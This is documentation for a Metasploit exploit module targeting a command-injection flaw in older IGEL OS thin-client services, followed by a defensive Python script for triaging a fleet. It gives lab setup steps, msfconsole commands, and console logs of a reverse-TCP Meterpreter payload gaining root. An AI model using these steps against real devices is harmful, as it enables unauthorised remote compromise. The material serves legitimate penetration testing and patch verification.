metasploit-gs/documentation/modules/exploit/linux/misc/igel_command_injection.md
2021-03-25 16:11:43 -04:00


Vulnerable Application

IGEL OS versions before 11.04.270 and 10.06.220 are vulnerable to remote command execution through injection into a system() call, reachable via the Secure Terminal and Secure Shadow services.

This module uses the vulnerability to modify certain systemd limits for the targeted service before transferring the payload; this is done to increase payload transfer throughput and preserve service stability. After exploitation these changes are reverted.

Secure Terminal/telnet_ssl_connector: 30022/tcp
Secure Shadow/vnc_ssl_connector: 5900/tcp
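
For fleet triage, the version bounds and service ports above can be checked against an inventory. The following is an added example, not part of the module or the original documentation. It assumes a three-part numeric version string, that each fixed build applies to its own major branch (11.x and 10.x), and a constructed inventory with hypothetical host names.

```python
# Added example: flag thin clients that run an affected IGEL OS build and
# listen on one of the two affected services. Inventory data is constructed.

# First fixed build per major branch, taken from the text above (assumption:
# each bound applies only to its own branch).
FIXED = {11: (11, 4, 270), 10: (10, 6, 220)}
SERVICE_PORTS = {30022: "Secure Terminal", 5900: "Secure Shadow"}

def parse_version(text):
    """'11.04.130' -> (11, 4, 130); raises ValueError on anything else."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected version string: {text!r}")
    return tuple(int(p) for p in parts)

def assess(version_text, open_ports):
    """Return (status, exposed_service_names) for one host."""
    try:
        version = parse_version(version_text)
    except ValueError:
        return "unknown", []          # unparseable: needs manual review
    fixed = FIXED.get(version[0])
    if fixed is None:
        return "unknown", []          # branch not covered by the text above
    exposed = sorted(n for p, n in SERVICE_PORTS.items() if p in open_ports)
    if version >= fixed:
        return "patched", exposed
    return ("exposed" if exposed else "vulnerable-not-listening"), exposed

def triage(inventory):
    """Map host name -> assess() result for (host, version, ports) rows."""
    return {host: assess(ver, ports) for host, ver, ports in inventory}

# Constructed sample inventory (hypothetical hosts and port scan results).
INVENTORY = [
    ("thin-01", "11.04.130", {22, 30022}),
    ("thin-02", "10.05.500", {5900}),
    ("thin-03", "11.04.270", {30022, 5900}),
    ("thin-04", "11.03.500", set()),
    ("thin-05", "n/a", {5900}),
]

if __name__ == "__main__":
    for host, (status, services) in triage(INVENTORY).items():
        print(f"{host}: {status} {', '.join(services)}")
```

Hosts reported as `vulnerable-not-listening` still need the firmware update, since either service can be enabled later in Setup.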

Verification Steps

Download a vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.

Unpack the downloaded zip file and create a VM using the included .iso.

Navigate through the installation menus to install the firmware, and reboot when prompted.

After the reboot, work through the presented configuration wizard. In the Activation section use the starter license (selected by default). Skip the ICG Agent Setup. Upon completion the system will reboot again.

Turn on vulnerable services

  1. Click on the launcher menu
  2. Click on the gear icon
  3. Select "Setup" from the Application menu to launch the Setup app
  4. To enable the vulnerable VNC service wrapper: under the configuration menu on the left, navigate to System > Remote Access > Shadow. Ensure "Allow remote shadowing" and "Secure mode" are checked.
  5. To enable the vulnerable terminal wrapper: under the configuration menu on the left, navigate to System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.

Exploitation

  1. start msfconsole
  2. use exploit/linux/misc/igel_command_injection
  3. set RHOST [TARGET IP]
  4. set RPORT [30022 or 5900]
  5. set LHOST [LOCAL IP]
  6. exploit

Misc

To obtain the IGEL's IP address to test against, click the up/down arrows on the right side of the task bar, then click "More Details". A shell is available on a virtual console via ctrl+alt+F11; switch back to the GUI with ctrl+alt+F1.

This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500.

Options

Scenarios

IGEL OS 11.04.130

Targeting the Secure Terminal service (30022/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.224
RHOST => 192.168.120.224
msf6 exploit(linux/misc/igel_command_injection) > check
[*] 192.168.120.224:30022 - The target appears to be vulnerable.
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.service StartLimitBurst
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.224:30022 - Writing payload to file /tmp/CPr9.
[*] 192.168.120.224:30022 - Executing payload /tmp/CPr9.
[*] 192.168.120.224:30022 - Removing payload file /tmp/CPr9.
[*] Sending stage (39324 bytes) to 192.168.120.224
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.224:48130) at 2021-03-25 12:29:45 -0400
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.service
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.socket

meterpreter > getuid
Server username: root
meterpreter > 

IGEL OS 10.05.500

Targeting the Secure Shadowing service (5900/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.226
RHOST => 192.168.120.226
msf6 exploit(linux/misc/igel_command_injection) > set RPORT 5900
RPORT => 5900
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.service StartLimitBurst
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.226:5900 - Writing payload to file /tmp/lSmU.
[*] 192.168.120.226:5900 - Executing payload /tmp/lSmU.
[*] 192.168.120.226:5900 - Removing payload file /tmp/lSmU.
[*] Sending stage (39328 bytes) to 192.168.120.226
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.service
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.socket
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.226:55144) at 2021-03-25 12:48:34 -0400

meterpreter > getuid
Server username: root
meterpreter >